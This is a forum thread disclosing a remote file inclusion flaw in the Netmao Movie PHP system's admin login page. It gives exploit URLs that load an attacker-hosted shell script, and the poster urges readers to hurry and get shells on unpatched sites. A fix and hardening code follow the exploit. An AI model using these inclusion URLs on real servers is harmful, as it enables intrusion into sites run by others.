Server maintenance, managed server administration, security configuration, vulnerability scanning, intrusion detection services

dirtysea posted on 2007-11-27 20:29:18

Netmao Movie (网猫电影系统) vulnerability

IceskYsl published a series on PHP vulnerabilities on NOHACK. The first installment was about file inclusion vulnerabilities.

So today I quickly found one, and I don't dare keep it to myself! Heh.

Program: Netmao Movie (网猫电影系统).

A note: its latest version is currently 3.0, and since that one is encrypted it is hard to study further.
However, many of the installations in use online are not the latest version. So anyone who wants to get a shell had better hurry.

Vulnerable file: login.php in the admin directory.

Code:

    if($action=='login'){

        @session_start();
        if($_SESSION['randomstr']!=$checkcode){
            cpmsg('对不起,验证码错误','?file=login');
            exit();
        }

        $referer=$referer?$referer:'?file=';

        $username=addslashes($username);
        $password=addslashes($password);
        $password=MD5($password);

        $result=$db->query("Select * FROM $table_member Where user='$username' AND pwd='$password'");
        if($db->num_rows($result)==1){
            $r=$db->fetch_array($result);
            $_SESSION=$r[$user];
            if($r=='1'){$_SESSION='1';}
            cpmsg("登录成功!",$referer);
        }else{
            session_destroy();
            cpmsg("对不起,帐号和密码不匹配!",$referer);
        }

    }elseif($action=='logout'){

        session_destroy();
        cpmsg("你已经成功退出!",'?file=login');

    }
    else
    {

        // $A_tpl is never assigned before this include
        include $A_tpl.'/login.tpl.php';

    }

Let's go straight to the code in the else branch. The variable A_tpl is never assigned a value and is used directly.
Requesting admin/login.php directly discloses the path.

EXP:
(1)
admin/login.php?A_tpl=http://www.xxxx.com/cmd.txt?
(2)
On hosting that does not support PHP scripts, create a login.tpl.php (your own script trojan, of course),
then visit admin/login.php?A_tpl=http://www.xxxx.com

OK, that's it. I'm new here, so I'd appreciate pointers from all the experts.
---------------------------------------------------------------------------------------------------
Fix for the vulnerability:

    function StopRemoteInclude($InclueName){
        if(strpos($InclueName,'\\')!==false){
            return substr($InclueName,0,strrpos($InclueName,'\\'));
        }elseif(strpos($InclueName,'/')!==false){
            return substr($InclueName,0,strrpos($InclueName,'/'));
        }else{
            return '/';
        }
    }

    define('S_Dir',__FILE__?StopRemoteInclude(__FILE__).'/' : './');
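
An added example, not part of the original post and not Netmao's code: one way to harden the include is to resolve the template path locally and confirm it stays inside the application directory before including it. The function name template_path(), the demo directory layout and the candidate values are assumptions made for illustration.

```php
<?php
// Added example, not Netmao code. template_path() and the demo layout are hypothetical.

function template_path(string $appRoot, string $tplDir, string $file): ?string
{
    $base = realpath($appRoot);
    // Prefixing $appRoot means a value such as "http://host" is treated as a
    // local directory name; realpath() returns false when nothing exists there.
    $path = realpath($appRoot . '/' . $tplDir . '/' . $file);
    if ($base === false || $path === false) {
        return null;
    }
    // After resolving ".." and symlinks, the file must still be inside $appRoot.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo tree: app/templates holds the real template, outside/ is not part of the app.
$tmp = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
foreach (['app/templates', 'outside'] as $dir) {
    mkdir("$tmp/$dir", 0700, true);
    file_put_contents("$tmp/$dir/login.tpl.php", "<?php echo 'template from $dir', PHP_EOL;");
}

// In login.php the directory should be a value set by the application itself.
// The candidates below stand in for what an uninitialised $A_tpl could receive
// from the query string (constructed sample values).
$candidates = ['templates', 'http://www.xxxx.com', '../outside', 'missing'];
foreach ($candidates as $tplDir) {
    $file = template_path("$tmp/app", $tplDir, 'login.tpl.php');
    printf("%-22s => %s\n", $tplDir, $file === null ? 'rejected' : 'accepted');
    if ($file !== null) {
        include $file;
    }
}

// Clean up the demo tree.
foreach (['app/templates', 'outside'] as $dir) {
    unlink("$tmp/$dir/login.tpl.php");
    rmdir("$tmp/$dir");
}
rmdir("$tmp/app");
rmdir($tmp);
```

Independently of the code, setting `allow_url_include = Off` and, on PHP versions that still have it, `register_globals = Off` in php.ini removes the two conditions this include relies on.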

iceman02 posted on 2006-6-8 17:27:33

re: Netmao Movie (网猫电影系统) vulnerability

Happy birthday, Brother Hai!